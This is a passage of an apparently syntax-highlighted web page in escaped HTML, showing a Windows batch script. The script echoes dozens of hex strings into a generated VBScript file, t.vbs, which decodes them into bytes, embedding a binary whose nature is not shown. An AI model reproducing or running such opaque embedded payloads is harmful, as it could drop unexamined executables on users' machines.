top;"&gt;&lt;div style="margin: 0pt; padding: 0pt; background: transparent none repeat scroll 0% 0%; font-family: monospace; font-style: normal; font-variant: normal; font-weight: normal; font-size: 1em; line-height: 1.2em; font-size-adjust: none; font-stretch: normal; -moz-background-clip: -moz-initial; -moz-background-origin: -moz-initial; -moz-background-inline-policy: -moz-initial; vertical-align: top;"&gt;"9EBF3C19C7656E456C07F5D841CFE98602DBF580B310192DD26C42203BE86A1C24EC5F"&lt;/div&gt;&lt;/li&gt;&lt;li style="font-weight: normal; vertical-align: top;"&gt;&lt;div style="margin: 0pt; padding: 0pt; background: transparent none repeat scroll 0% 0%; font-family: monospace; font-style: normal; font-variant: normal; font-weight: normal; font-size: 1em; line-height: 1.2em; font-size-adjust: none; font-stretch: normal; -moz-background-clip: -moz-initial; -moz-background-origin: -moz-initial; -moz-background-inline-policy: -moz-initial; vertical-align: top;"&gt;"E2AF723AB93B019AB44A83810530FDE5307D2FBE50ED9946C1DE0260ADE19E001F6929"&lt;/div&gt;&lt;/li&gt;&lt;li style="font-weight: normal; vertical-align: top;"&gt;&lt;div style="margin: 0pt; padding: 0pt; background: transparent none repeat scroll 0% 0%; font-family: monospace; font-style: normal; font-variant: normal; font-weight: normal; font-size: 1em; line-height: 1.2em; font-size-adjust: none; font-stretch: normal; -moz-background-clip: -moz-initial; -moz-background-origin: -moz-initial; -moz-background-inline-policy: -moz-initial; vertical-align: top;"&gt;"550FED978DA26A04CCE19475C05D3AE82E1D7297F60B910908A4CF75150607CEF45403"&lt;/div&gt;&lt;/li&gt;&lt;li style="font-weight: normal; vertical-align: top;"&gt;&lt;div style="margin: 0pt; padding: 0pt; background: transparent none repeat scroll 0% 0%; font-family: monospace; font-style: normal; font-variant: normal; font-weight: normal; font-size: 1em; line-height: 1.2em; font-size-adjust: none; font-stretch: normal; -moz-background-clip: -moz-initial; -moz-background-origin: -moz-initial; -moz-background-inline-policy: -moz-initial; vertical-align: top;"&gt;"C98C42E47CA8750D06B06A83E503F4D832E7807C5AB68302E197D1EC41A020103AC04F"&lt;/div&gt;&lt;/li&gt;&lt;li style="font-weight: normal; vertical-align: top;"&gt;&lt;div style="margin: 0pt; padding: 0pt; background: transparent none repeat scroll 0% 0%; font-family: monospace; font-style: normal; font-variant: normal; font-weight: normal; font-size: 1em; line-height: 1.2em; font-size-adjust: none; font-stretch: normal; -moz-background-clip: -moz-initial; -moz-background-origin: -moz-initial; -moz-background-inline-policy: -moz-initial; vertical-align: top;"&gt;"663B62511EA2546D3DB30108CECDC8EFBF2A089A03307776AA45021AC5D73C5BCFDF08"&lt;/div&gt;&lt;/li&gt;&lt;li style="font-weight: normal; vertical-align: top;"&gt;&lt;div style="margin: 0pt; padding: 0pt; background: transparent none repeat scroll 0% 0%; font-family: monospace; font-style: normal; font-variant: normal; font-weight: normal; font-size: 1em; line-height: 1.2em; font-size-adjust: none; font-stretch: normal; -moz-background-clip: -moz-initial; -moz-background-origin: -moz-initial; -moz-background-inline-policy: -moz-initial; vertical-align: top;"&gt;"703CDB4DC0A9C10E5DDF444217001145B7E55994EA94B9503218AC82C00E1984E39C36"&lt;/div&gt;&lt;/li&gt;&lt;li style="font-weight: normal; vertical-align: top;"&gt;&lt;div style="margin: 0pt; padding: 0pt; background: transparent none repeat scroll 0% 0%; font-family: monospace; font-style: normal; font-variant: normal; font-weight: normal; font-size: 1em; line-height: 1.2em; font-size-adjust: none; font-stretch: normal; -moz-background-clip: -moz-initial; -moz-background-origin: -moz-initial; -moz-background-inline-policy: -moz-initial; vertical-align: top;"&gt;"16CA7AE10402ECDDB2A5358F84EAF98DD0132BFAD9E9634778330ED118F2A804B657EF"&lt;/div&gt;&lt;/li&gt;&lt;li style="font-weight: normal; vertical-align: top;"&gt;&lt;div style="margin: 0pt; padding: 0pt; background: transparent none repeat scroll 0% 0%; font-family: monospace; font-style: normal; font-variant: normal; font-weight: normal; font-size: 1em; line-height: 1.2em; font-size-adjust: none; font-stretch: normal; -moz-background-clip: -moz-initial; -moz-background-origin: -moz-initial; -moz-background-inline-policy: -moz-initial; vertical-align: top;"&gt;"8342FB6F8D1FDB7687D856CF772931D3AFE74F285132B33DC6C036B76E90DE7B07AA38"&lt;/div&gt;&lt;/li&gt;&lt;li style="font-weight: normal; vertical-align: top;"&gt;&lt;div style="margin: 0pt; padding: 0pt; background: transparent none repeat scroll 0% 0%; font-family: monospace; font-style: normal; font-variant: normal; font-weight: normal; font-size: 1em; line-height: 1.2em; font-size-adjust: none; font-stretch: normal; -moz-background-clip: -moz-initial; -moz-background-origin: -moz-initial; -moz-background-inline-policy: -moz-initial; vertical-align: top;"&gt;"5D3FB232047046E912D83E980080E6CD4382C0F5692EB211003BC01F76B20F763305E9"&lt;/div&gt;&lt;/li&gt;&lt;li style="font-weight: normal; vertical-align: top;"&gt;&lt;div style="margin: 0pt; padding: 0pt; background: transparent none repeat scroll 0% 0%; font-family: monospace; font-style: normal; font-variant: normal; font-weight: normal; font-size: 1em; line-height: 1.2em; font-size-adjust: none; font-stretch: normal; -moz-background-clip: -moz-initial; -moz-background-origin: -moz-initial; -moz-background-inline-policy: -moz-initial; vertical-align: top;"&gt;"BA2A51FC8632C76F3D971841B24C26ABC4E46E1C1222939528DA43201272600CCF53D8"&lt;/div&gt;&lt;/li&gt;&lt;li style="font-weight: normal; vertical-align: top;"&gt;&lt;div style="margin: 0pt; padding: 0pt; background: transparent none repeat scroll 0% 0%; font-family: monospace; font-style: normal; font-variant: normal; font-weight: normal; font-size: 1em; line-height: 1.2em; font-size-adjust: none; font-stretch: normal; -moz-background-clip: -moz-initial; -moz-background-origin: -moz-initial; -moz-background-inline-policy: -moz-initial; vertical-align: top;"&gt;"D091927114F01340754F29089B845D0A4A21A0416BE99648B779A52305DB895D8ED3E6"&lt;/div&gt;&lt;/li&gt;&lt;li style="font-weight: normal; vertical-align: top;"&gt;&lt;div style="margin: 0pt; padding: 0pt; background: transparent none repeat scroll 0% 0%; font-family: monospace; font-style: normal; font-variant: normal; font-weight: normal; font-size: 1em; line-height: 1.2em; font-size-adjust: none; font-stretch: normal; -moz-background-clip: -moz-initial; -moz-background-origin: -moz-initial; -moz-background-inline-policy: -moz-initial; vertical-align: top;"&gt;"2F407393C8536B2C925CAC7E0AF4806A20DF13A11AE0ABAF0882274C73890DE1DB7FC2"&lt;/div&gt;&lt;/li&gt;&lt;li style="font-weight: normal; vertical-align: top;"&gt;&lt;div style="margin: 0pt; padding: 0pt; background: transparent none repeat scroll 0% 0%; font-family: monospace; font-style: normal; font-variant: normal; font-weight: normal; font-size: 1em; line-height: 1.2em; font-size-adjust: none; font-stretch: normal; -moz-background-clip: -moz-initial; -moz-background-origin: -moz-initial; -moz-background-inline-policy: -moz-initial; vertical-align: top;"&gt;"71F9B5205AE55C7B993FC2B02041603C0A542D5C78CB21264038E26A976A58B9BDB7AC"&lt;/div&gt;&lt;/li&gt;&lt;li style="font-weight: normal; vertical-align: top;"&gt;&lt;div style="margin: 0pt; padding: 0pt; background: transparent none repeat scroll 0% 0%; font-family: monospace; font-style: normal; font-variant: normal; font-weight: normal; font-size: 1em; line-height: 1.2em; font-size-adjust: none; font-stretch: normal; -moz-background-clip: -moz-initial; -moz-background-origin: -moz-initial; -moz-background-inline-policy: -moz-initial; vertical-align: top;"&gt;"546CB8B31096B0250D7E84943CF87D06B396B9F8331F7F62F14E64364EE59D886792A1"&lt;/div&gt;&lt;/li&gt;&lt;li style="font-weight: normal; vertical-align: top;"&gt;&lt;div style="margin: 0pt; padding: 0pt; background: transparent none repeat scroll 0% 0%; font-family: monospace; font-style: normal; font-variant: normal; font-weight: normal; font-size: 1em; line-height: 1.2em; font-size-adjust: none; font-stretch: normal; -moz-background-clip: -moz-initial; -moz-background-origin: -moz-initial; -moz-background-inline-policy: -moz-initial; vertical-align: top;"&gt;"24F6B32A2DFA35B0423DE0D8AA4E81A456ED8C4281B049DDA5DD6F3FC580541841CA1F"&lt;/div&gt;&lt;/li&gt;&lt;li style="font-weight: normal; vertical-align: top;"&gt;&lt;div style="margin: 0pt; padding: 0pt; background: transparent none repeat scroll 0% 0%; font-family: monospace; font-style: normal; font-variant: normal; font-weight: normal; font-size: 1em; line-height: 1.2em; font-size-adjust: none; font-stretch: normal; -moz-background-clip: -moz-initial; -moz-background-origin: -moz-initial; -moz-background-inline-policy: -moz-initial; vertical-align: top;"&gt;"85196A0E30D335ED80CA40BE9BEDF6282D7C206AB4DFA1D2FA142A773E0EADA141A8F5"&lt;/div&gt;&lt;/li&gt;&lt;li style="font-weight: normal; vertical-align: top;"&gt;&lt;div style="margin: 0pt; padding: 0pt; background: transparent none repeat scroll 0% 0%; font-family: monospace; font-style: normal; font-variant: normal; font-weight: normal; font-size: 1em; line-height: 1.2em; font-size-adjust: none; font-stretch: normal; -moz-background-clip: -moz-initial; -moz-background-origin: -moz-initial; -moz-background-inline-policy: -moz-initial; vertical-align: top;"&gt;&lt;span style="color: rgb(102, 204, 102);"&gt;)&lt;/span&gt; &lt;a href="http://www.ss64.com/nt/do.html"&gt;&lt;span style="color: rgb(0, 177, 0); font-weight: bold;"&gt;Do&lt;/span&gt;&lt;/a&gt; &gt;&gt;t.vbs &lt;span style="color: rgb(102, 204, 102);"&gt;(&lt;/span&gt;&lt;/div&gt;&lt;/li&gt;&lt;li style="font-weight: normal; vertical-align: top;"&gt;&lt;div style="margin: 0pt; padding: 0pt; background: transparent none repeat scroll 0% 0%; font-family: monospace; font-style: normal; font-variant: normal; font-weight: normal; font-size: 1em; line-height: 1.2em; font-size-adjust: none; font-stretch: normal; -moz-background-clip: -moz-initial; -moz-background-origin: -moz-initial; -moz-background-inline-policy: -moz-initial; vertical-align: top;"&gt;&lt;a href="http://www.ss64.com/nt/echo.html"&gt;&lt;span style="color: rgb(177, 177, 0); font-weight: bold;"&gt;Echo&lt;/span&gt;&lt;/a&gt;.&lt;a href="http://www.ss64.com/nt/for.html"&gt;&lt;span style="color: rgb(0, 177, 0); font-weight: bold;"&gt;For&lt;/span&gt;&lt;/a&gt; b=1To 69Step 2:o.Write Chr&lt;span style="color: rgb(102, 204, 102);"&gt;(&lt;/span&gt;Clng&lt;span style="color: rgb(102, 204, 102);"&gt;(&lt;/span&gt;"&amp;amp;H"^&amp;amp;Mid&lt;span style="color: rgb(102, 204, 102);"&gt;(&lt;/span&gt;&lt;span style="color: rgb(51, 204, 51);"&gt;%%&lt;/span&gt;&lt;span style="color: rgb(68, 136, 136);"&gt;b&lt;/span&gt;,b,W^&lt;span style="color: rgb(102, 204, 102);"&gt;)&lt;/span&gt;^&lt;span style="color: rgb(102, 204, 102);"&gt;)&lt;/span&gt;^&lt;span style="color: rgb(102, 204, 102);"&gt;)&lt;/span&gt;:Next&lt;span style="color: rgb(102, 204, 102);"&gt;)&lt;/span&gt;&lt;/div&gt;&lt;/li&gt;&lt;li style="font-weight: normal; vertical-align: top;"&gt;&lt;div style="margin: 0pt; padding: 0pt; background: transparent none repeat scroll 0% 0%; font-family: monospace; font-style: normal; font-variant: normal; font-weight: normal; font-size: 1em; line-height: 1.2em; font-size-adjust: none; font-stretch: normal; -moz-background-clip: -moz-initial; -moz-background-origin: -moz-initial; -moz-background-inline-policy: -moz-initial; vertical-align: top;"&gt;&lt;a href="http://www.ss64.com/nt/for.html"&gt;&lt;span style="color: rgb(0, 177, 0); font-weight: bold;"&gt;For&lt;/span&gt;&lt;/a&gt; &lt;span style="color: rgb(51, 204, 51);"&gt;%%&lt;/span&gt;&lt;span style="color: rgb(68, 136, 136);"&gt;b&lt;/span&gt; &lt;a href="http://www.ss64.com/nt/in.html"&gt;&lt;span style="color: rgb(0, 177, 0); font-weight: bold;"&gt;In&lt;/span&gt;&lt;/a&gt; &lt;span style="color: rgb(102, 204, 102);"&gt;(&lt;/span&gt;&lt;/div&gt;&lt;/li&gt;&lt;li style="font-weight: normal; vertical-align: top;"&gt;&lt;div style="margin: 0pt; padding: 0pt; background: transparent none repeat scroll 0% 0%; font-family: monospace; font-style: normal; font-variant: normal; font-weight: normal; font-size: 1em; line-height: 1.2em; font-size-adjust: none; font-stretch: normal; -moz-background-clip: -moz-initial; -moz-background-origin: -moz-initial; -moz-background-inline-policy: -moz-initial; vertical-align: top;"&gt;"267E07DC5AE3D1D02A407BBE3B0573964791440FA046B8591084356B60F54DEBD00D81"&lt;/div&gt;&lt;/li&gt;&lt;li style="font-weight: normal; vertical-align: top;"&gt;&lt;div style="margin: 0pt; padding: 0pt; background: transparent none repeat scroll 0% 0%; font-family: monospace; font-style: normal; font-variant: normal; font-weight: normal; font-size: 1em; line-height: 1.2em; font-size-adjust: none; font-stretch: normal; -moz-background-clip: -moz-initial; -moz-background-origin: -moz-initial; -moz-background-inline-policy: -moz-initial; vertical-align: top;"&gt;"E40A7B20B2213D1FA1DE48C906F47CD066589AB1D366ECB410A1AEE908C25B6869D5A5"&lt;/div&gt;&lt;/li&gt;&lt;li style="font-weight: normal; vertical-align: top;"&gt;&lt;div style="margin: 0pt; padding: 0pt; background: transparent none repeat scroll 0% 0%; font-family: monospace; font-style: normal; font-variant: normal; font-weight: normal; font-size: 1em; line-height: 1.2em; font-size-adjust: none; font-stretch: normal; -moz-background-clip: -moz-initial; -moz-background-origin: -moz-initial; -moz-background-inline-policy: -moz-initial; vertical-align: top;"&gt;"DDACCC00E8BD0A38A867FD09AA99E916BCF0FF0EF7117CA8C11A601022B14E48994BC9"&lt;/div&gt;&lt;/li&gt;&lt;li style="font-weight: normal; vertical-align: top;"&gt;&lt;div style="margin: 0pt; padding: 0pt; background: transparent none repeat scroll 0% 0%; font-family: monospace; font-style: normal; font-variant: normal; font-weight: normal; font-size: 1em; line-height: 1.2em; font-size-adjust: none; font-stretch: normal; -moz-background-clip: -moz-initial; -moz-background-origin: -moz-initial; -moz-background-inline-policy: -moz-initial; vertical-align: top;"&gt;"339FFE2241F85E203AE8D567326CD83F017ED9C5B0341226E16AEFE564DC04777197BE"&lt;/div&gt;&lt;/li&gt;&lt;li style="font-weight: normal; vertical-align: top;"&gt;&lt;div style="margin: 0pt; padding: 0pt; background: transparent none repeat scroll 0% 0%; font-family: monospace; font-style: normal; font-variant: normal; font-weight: normal; font-size: 1em; line-height: 1.2em; font-size-adjust: none; font-stretch: normal; -moz-background-clip: -moz-initial; -moz-background-origin: -moz-initial; -moz-background-inline-policy: -moz-initial; vertical-align: top;"&gt;"847F5282031FE0CC3CA7EBA2AD55A7BCED43A07DDA24EC8E58B3C142640694BC93DA89"&lt;/div&gt;&lt;/li&gt;&lt;li style="font-weight: normal; vertical-align: top;"&gt;&lt;div style="margin: 0pt; padding: 0pt; background: transparent none repeat scroll 0% 0%; font-family: monospace; font-style: normal; font-variant: normal; font-weight: normal; font-size: 1em; line-height: 1.2em; font-size-adjust: none; font-stretch: normal; -moz-background-clip: -moz-initial; -moz-background-origin: -moz-initial; -moz-background-inline-policy: -moz-initial; vertical-align: top;"&gt;"4DF98F011791DAD54D5A8C588A6F63A4C0D0929D195068C2784E82C10FEB51EC7E200A"&lt;/div&gt;&lt;/li&gt;&lt;li style="font-weight: normal; vertical-align: top;"&gt;&lt;div style="margin: 0pt; padding: 0pt; background: transparent none repeat scroll 0% 0%; font-family: monospace; font-style: normal; font-variant: normal; font-weight: normal; font-size: 1em; line-height: 1.2em; font-size-adjust: none; font-stretch: normal; -moz-background-clip: -moz-initial; -moz-background-origin: -moz-initial; -moz-background-inline-policy: -moz-initial; vertical-align: top;"&gt;"AB2E87C180CC0CB84257F663D79E66A80D6F784F7548FDC020643D935C7B185AB507AB"&lt;/div&gt;&lt;/li&gt;&lt;li style="font-weight: normal; vertical-align: top;"&gt;&lt;div style="margin: 0pt; padding: 0pt; background: transparent none repeat scroll 0% 0%; font-family: monospace; font-style: normal; font-variant: normal; font-weight: normal; font-size: 1em; line-height: 1.2em; font-size-adjust: none; font-stretch: normal; -moz-background-clip: -moz-initial; -moz-background-origin: -moz-initial; -moz-background-inline-policy: -moz-initial; vertical-align: top;"&gt;"20CA0339DFC7EDB34A9E41A4F8B98174894720BB27EEC0B9BB263E8A97356BC0EAE0EC"&lt;/div&gt;&lt;/li&gt;&lt;li style="font-weight: normal; vertical-align: top;"&gt;&lt;div style="margin: 0pt; padding: 0pt; background: transparent none repeat scroll 0% 0%; font-family: monospace; font-style: normal; font-variant: normal; font-weight: normal; font-size: 1em; line-height: 1.2em; font-size-adjust: none; font-stretch: normal; -moz-background-clip: -moz-initial; -moz-background-origin: -moz-initial; -moz-background-inline-policy: -moz-initial; vertical-align: top;"&gt;"26EAA19D1B94E04C5A5A4A4B3BA3B1409EF91D5270130CEDD22AD13961E596FE99283F"&lt;/div&gt;&lt;/li&gt;&lt;li style="font-weight: normal; vertical-align: top;"&gt;&lt;div style="margin: 0pt; padding: 0pt; background: transparent none repeat scroll 0% 0%; font-family: monospace; font-style: normal; font-variant: normal; font-weight: normal; font-size: 1em; line-height: 1.2em; font-size-adjust: none; font-stretch: normal; -moz-background-clip: -moz-initial; -moz-background-origin: -moz-initial; -moz-background-inline-policy: -moz-initial; vertical-align: top;"&gt;"B1707F0D5F10806B4B9C113F04859ED7808EB428C4E541139A051B880409B878A0671D"&lt;/div&gt;&lt;/li&gt;&lt;li style="font-weight: normal; vertical-align: top;"&gt;&lt;div style="margin: 0pt; padding: 0pt; background: transparent none repeat scroll 0% 0%; font-family: monospace; font-style: normal; font-variant: normal; font-weight: normal; font-size: 1em; line-height: 1.2em; font-size-adjust: none; font-stretch: normal; -moz-background-clip: -moz-initial; -moz-background-origin: -moz-initial; -moz-background-inline-policy: -moz-initial; vertical-align: top;"&gt;"A03322CE9C4EC691A6B44AC7862E36DEB55119C8C671D911DAE8A047A63391DAD97809"&lt;/div&gt;&lt;/li&gt;&lt;li style="font-weight: normal; vertical-align: top;"&gt;&lt;div style="margin: 0pt; padding: 0pt; background: transparent none repeat scroll 0% 0%; font-family: monospace; font-style: normal; font-variant: normal; font-weight: normal; font-size: 1em; line-height: 1.2em; font-size-adjust: none; font-stretch: normal; -moz-background-clip: -moz-initial; -moz-background-origin: -moz-initial; -moz-background-inline-policy: -moz-initial; vertical-align: top;"&gt;"D7C6E025444BB27F4F69AA9C845AB674BF54846379EF0644670FD5BD07BC2327FB461E"&lt;/div&gt;&lt;/li&gt;&lt;li style="font-weight: normal; vertical-align: top;"&gt;&lt;div style="margin: 0pt; padding: 0pt; background: transparent none repeat scroll 0% 0%; font-family: monospace; font-style: normal; font-variant: normal; font-weight: normal; font-size: 1em; line-height: 1.2em; font-size-adjust: none; font-stretch: normal; -moz-background-clip: -moz-initial; -moz-background-origin: -moz-initial; -moz-background-inline-policy: -moz-initial; vertical-align: top;"&gt;"F3270E5A2CAB6E528B842F3DC0E56404EE6B4AA344FF4E75A8BA6963549844F12850D0"&lt;/div&gt;&lt;/li&gt;&lt;li style="font-weight: normal; vertical-align: top;"&gt;&lt;div style="margin: 0pt; padding: 0pt; background: transparent none repeat scroll 0% 0%; font-family: monospace; font-style: normal; font-variant: normal; font-weight: normal; font-size: 1em; line-height: 1.2em; font-size-adjust: none; font-stretch: normal; -moz-background-clip: -moz-initial; -moz-background-origin: -moz-initial; -moz-background-inline-policy: -moz-initial; vertical-align: top;"&gt;"BB9CAEED0F481766041E54ECCE01C5AED87D57B0EA68CB80A9354F16D5308B6B947385"&lt;/div&gt;&lt;/li&gt;&lt;li style="font-weight: normal; vertical-align: top;"&gt;&lt;div style="margin: 0pt; padding: 0pt; background: transparent none repeat scroll 0% 0%; font-family: monospace; font-style: normal; font-variant: normal; font-weight: normal; font-size: 1em; line-height: 1.2em; font-size-adjust: none; font-stretch: normal; -moz-background-clip: -moz-initial; -moz-background-origin: -moz-initial; -moz-background-inline-policy: -moz-initial; vertical-align: top;"&gt;"72CD65FB046EB52CF0A4E68A5DEEDA0F3A63AEE6B8FD2BD1E47A579BCC62C3D5D648D0"&lt;/div&gt;&lt;/li&gt;&lt;li style="font-weight: normal; vertical-align: top;"&gt;&lt;div style="margin: 0pt; padding: 0pt; background: transparent none repeat scroll 0% 0%; font-family: monospace; font-style: normal; font-variant: normal; font-weight: normal; font-size: 1em; line-height: 1.2em; font-size-adjust: none; font-stretch: normal; -moz-background-clip: -moz-initial; -moz-background-origin: -moz-initial; -moz-background-inline-policy: -moz-initial; vertical-align: top;"&gt;"8A0E913790F52BF8DB703180B06A6194F8FDFA15BCDBB73AE2B9ECD87DFC4D973E7275"&lt;/div&gt;&lt;/li&gt;&lt;li style="font-weight: normal; vertical-align: top;"&gt;&lt;div style="margin: 0pt; padding: 0pt; background: transparent none repeat scroll 0% 0%; font-family: monospace; font-style: normal; font-variant: normal; font-weight: normal; font-size: 1em; line-height: 1.2em; font-size-adjust: none; font-stretch: normal; -moz-background-clip: -moz-initial; -moz-background-origin: -moz-initial; -moz-background-inline-policy: -moz-initial; vertical-align: top;"&gt;"F964CA138DA24938A23AA405CBD946D146D1F4DE57B5F118FDF9A8327F982A42DCDCE1"&lt;/div&gt;&lt;/li&gt;&lt;li style="font-weight: normal; vertical-align: top;"&gt;&lt;div style="margin: 0pt; padding: 0pt; background: transparent none repeat scroll 0% 0%; font-family: monospace; font-style: normal; font-variant: normal; font-weight: normal; font-size: 1em; line-height: 1.2em; font-size-adjust: none; font-stretch: normal; -moz-background-clip: -moz-initial; -moz-background-origin: -moz-initial; -moz-background-inline-policy: -moz-initial; vertical-align: top;"&gt;"BC059C24499590425DA3BC58A5BB3656D90A29BE0B963B7507127543AA7FEADD661E74"&lt;/div&gt;&lt;/li&gt;&lt;li style="font-weight: normal; vertical-align: top;"&gt;&lt;div style="margin: 0pt; padding: 0pt; background: transparent none repeat scroll 0% 0%; font-family: monospace; font-style: normal; font-variant: normal; font-weight: normal; font-size: 1em; line-height: 1.2em; font-size-adjust: none; font-stretch: normal; -moz-background-clip: -moz-initial; -moz-background-origin: -moz-initial; -moz-background-inline-policy: -moz-initial; vertical-align: top;"&gt;"2E583E2F70AA9EFBAA9EC17E07B8E2BE2A375A13B2A61CE6C87D595AE2A7B50436023D"&lt;/div&gt;&lt;/li&gt;&lt;li style="font-weight: normal; vertical-align: top;"&gt;&lt;div style="margin: 0pt; padding: 0pt; background: transparent none repeat scroll 0% 0%; font-family: monospace; font-style: normal; font-variant: normal; font-weight: normal; font-size: 1em; line-height: 1.2em; font-size-adjust: none; font-stretch: normal; -moz-background-clip: -moz-initial; -moz-background-origin: -moz-initial; -moz-background-inline-policy: -moz-initial; vertical-align: top;"&gt;"13AA552DBB815F1604CB670650D3E525888540686E21D440C850B8D688F53EAE5AE596"&lt;/div&gt;&lt;/li&gt;&lt;li style="font-weight: normal; vertical-align: top;"&gt;&lt;div style="margin: 0pt; padding: 0pt; background: transparent none repeat scroll 0% 0%; font-family: monospace; font-style: normal; font-variant: normal; font-weight: normal; font-size: 1em; line-height: 1.2em; font-size-adjust: none; font-stretch: normal; -moz-background-clip: -moz-initial; -moz-background-origin: -moz-initial; -moz-background-inline-policy: -moz-initial; vertical-align: top;"&gt;"1D48B0A57462C044D07E39AECB0293315B374419CAC67325192D4737C736FD88E1B363"&lt;/div&gt;&lt;/li&gt;&lt;li style="font-weight: normal; vertical-align: top;"&gt;&lt;div style="margin: 0pt; padding: 0pt; background: transparent none repeat scroll 0% 0%; font-family: monospace; font-style: normal; font-variant: normal; font-weight: normal; font-size: 1em; line-height: 1.2em; font-size-adjust: none; font-stretch: normal; -moz-background-clip: -moz-initial; -moz-background-origin: -moz-initial; -moz-background-inline-policy: -moz-initial; vertical-align: top;"&gt;"66AB34D4ADEB1699CB847B42C0B0207554605ABABDB3E097C08F4F9628B268E37789EE"&lt;/div&gt;&lt;/li&gt;&lt;li style="font-weight: normal; vertical-align: top;"&gt;&lt;div style="margin: 0pt; padding: 0pt; background: transparent none repeat scroll 0% 0%; font-family: monospace; font-style: normal; font-variant: normal; font-weight: normal; font-size: 1em; line-height: 1.2em; font-size-adjust: none; font-stretch: normal; -moz-background-clip: -moz-initial; -moz-background-origin: -moz-initial; -moz-background-inline-policy: -moz-initial; vertical-align: top;"&gt;"40AC9EBF0F6E43EE06C5EEECDBABB501840DB206AC2E3D50AD0D842CC00301D2C94AFD"&lt;/div&gt;&lt;/li&gt;&lt;li style="font-weight: normal; vertical-align: top;"&gt;&lt;div style="margin: 0pt; padding: 0pt; background: transparent none repeat scroll 0% 0%; font-family: monospace; font-style: normal; font-variant: normal; font-weight: normal; font-size: 1em; line-height: 1.2em; font-size-adjust: none; font-stretch: normal; -moz-background-clip: -moz-initial; -moz-background-origin: -moz-initial; -moz-background-inline-policy: -moz-initial; vertical-align: top;"&gt;"5DC45E25259ACB3C48F96A7A7BD957D97B351D8CF2CFB867C34CB8F4D13352B8EF3118"&lt;/div&gt;&lt;/li&gt;&lt;li style="font-weight: normal; vertical-align: top;"&gt;&lt;div style="margin: 0pt; padding: 0pt; background: transparent none repeat scroll 0% 0%; font-family: monospace; font-style: normal; font-variant: normal; font-weight: normal; font-size: 1em; line-height: 1.2em; font-size-adjust: none; font-stretch: normal; -moz-background-clip: -moz-initial; -moz-background-origin: -moz-initial; -moz-background-inline-policy: -moz-initial; vertical-align: top;"&gt;"D1580B918FA3C560875460CF229F4229EE031DE5BDBE40AF406668F732F53BFA55BA3E"&lt;/div&gt;&lt;/li&gt;&lt;li style="font-weight: normal; vertical-align: top;"&gt;&lt;div style="margin: 0pt; padding: 0pt; background: transparent none repeat scroll 0% 0%; font-family: monospace; font-style: normal; font-variant: normal; font-weight: normal; font-size: 1em; line-height: 1.2em; font-size-adjust: none; font-stretch: normal; -moz-background-clip: -moz-initial; -moz-background-origin: -moz-initial; -moz-background-inline-policy: -moz-initial; vertical-align: top;"&gt;"551F9889A0B796035C770A8E75E9B83B05619695FBDB8AA65E5CFBCFACBE0BD6F3C495"&lt;/div&gt;&lt;/li&gt;&lt;li style="font-weight: normal; vertical-align: top;"&gt;&lt;div style="margin: 0pt; padding: 0pt; background: transparent none repeat scroll 0% 0%; font-family: monospace; font-style: normal; font-variant: normal; font-weight: normal; font-size: 1em; line-height: 1.2em; font-size-adjust: none; font-stretch: normal; -moz-background-clip: -moz-initial; -moz-background-origin: -moz-initial; -moz-background-inline-policy: -moz-initial; vertical-align: top;"&gt;"F81BA9C7DF594BF137A5107FB579F05BBD3DD2462F13ABE8655636BD0465D04B5C1ABD"&lt;/div&gt;&lt;/li&gt;&lt;li style="font-weight: normal; vertical-align: top;"&gt;&lt;div style="margin: 0pt; padding: 0pt; background: transparent none repeat scroll 0% 0%; font-family: monospace; font-style: normal; font-variant: normal; font-weight: normal; font-size: 1em; line-height: 1.2em; font-size-adjust: none; font-stretch: normal; -moz-background-clip: -moz-initial; -moz-background-origin: -moz-initial; -moz-background-inline-policy: -moz-initial; vertical-align: top;"&gt;"2C4886CBE30F0559EE4234C833B7D3ABF4993BEE429B297BA616CB2D5D60323B82308C"&lt;/div&gt;&lt;/li&gt;&lt;li style="font-weight: normal; vertical-align: top;"&gt;&lt;div style="margin: 0pt; padding: 0pt; background: transparent none repeat scroll 0% 0%; font-family: monospace; font-style: normal; font-variant: normal; font-weight: normal; font-size: 1em; line-height: 1.2em; font-size-adjust: none; font-stretch: normal; -moz-background-clip: -moz-initial; -moz-background-origin: -moz-initial; -moz-background-inline-policy: -moz-initial; vertical-align: top;"&gt;"414BBF136F3E5305A58E200C6F2648495B47D0ED36D199A76472B77442979D529A3D0D"&lt;/div&gt;&lt;/li&gt;&lt;li style="font-weight: normal; vertical-align: top;"&gt;&lt;div style="margin: 0pt; padding: 0pt; background: transparent none repeat scroll 0% 0%; font-family: monospace; font-style: normal; font-variant: normal; font-weight: normal; font-size: 1em; line-height: 1.2em; font-size-adjust: none; font-stretch: normal; -moz-background-clip: -moz-initial; -moz-background-origin: -moz-initial; -moz-background-inline-policy: -moz-initial; vertical-align: top;"&gt;"59243F2E66CBE949B8AE1FC02CF61322B7533F2472075CBCD3043996FBE49813C09417"&lt;/div&gt;&lt;/li&gt;&lt;li style="font-weight: normal; vertical-align: top;"&gt;&lt;div style="margin: 0pt; padding: 0pt; background: transparent none repeat scroll 0% 0%; font-family: monospace; font-style: normal; font-variant: normal; font-weight: normal; font-size: 1em; line-height: 1.2em; font-size-adjust: none; font-stretch: normal; -moz-background-clip: -moz-initial; -moz-background-origin: -moz-initial; -moz-background-inline-policy: -moz-initial; vertical-align: top;"&gt;&lt;span style="color: rgb(102, 204, 102);"&gt;)&lt;/span&gt; &lt;a href="http://www.ss64.com/nt/do.html"&gt;&lt;span style="color: rgb(0, 177, 0); font-weight: bold;"&gt;Do&lt;/span&gt;&lt;/a&gt; &gt;&gt;t.vbs &lt;span style="color: rgb(102, 204, 102);"&gt;(&lt;/span&gt;&lt;/div&gt;&lt;/li&gt;&lt;li style="font-weight: normal; vertical-align: top;"&gt;&lt;div style="margin: 0pt; padding: 0pt; background: transparent none repeat scroll 0% 0%; font-family: monospace; font-style: normal; font-variant: normal; font-weight: normal; font-size: 1em; line-height: 1.2em; font-size-adjust: none; font-stretch: normal; -moz-background-clip: -moz-initial; -moz-background-origin: -moz-initial; -moz-background-inline-policy: -moz-initial; vertical-align: top;"&gt;&lt;a href="http://www.ss64.com/nt/echo.html"&gt;&lt;span style="color: rgb(177, 177, 0); font-weight: bold;"&gt;Echo&lt;/span&gt;&lt;/a&gt;.&lt;a href="http://www.ss64.com/nt/for.html"&gt;&lt;span style="color: rgb(0, 177, 0); font-weight: bold;"&gt;For&lt;/span&gt;&lt;/a&gt; b=1To 69Step 2:o.Write Chr&lt;span style="color: rgb(102, 204, 102);"&gt;(&lt;/span&gt;Clng&lt;span style="color: rgb(102, 204, 